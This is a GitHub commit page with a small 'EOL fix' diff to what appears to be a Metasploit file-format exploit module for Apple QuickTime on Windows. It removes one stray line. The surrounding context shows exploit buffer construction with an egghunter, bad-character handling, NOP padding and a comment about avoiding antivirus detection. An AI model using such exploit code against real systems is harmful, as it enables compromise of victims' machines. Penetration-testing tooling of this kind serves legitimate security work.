Skip to content

Commit e7e712f

Browse files
committed
EOL fix
1 parent ab515fb commit e7e712f

File tree

1 file changed

+0
-2
lines changed

1 file changed

+0
-2
lines changed

modules/exploits/windows/fileformat/apple_quicktime_rdrf.rb

Lines changed: 0 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -82,8 +82,6 @@ def exploit
8282
badchars = payload_badchars
8383
hunter,egg = generate_egghunter(payload.encoded,badchars,{:checksum=>true})
8484

85-
badchars =
86-
8785
buf = ''
8886
buf << "\x61" * 5 # Make sure our NOPs don't cause AV
8987
buf << sort_bytes(make_nops(4)) # Pad 9 bytes to ensure alignment

0 commit comments

Comments
 (0)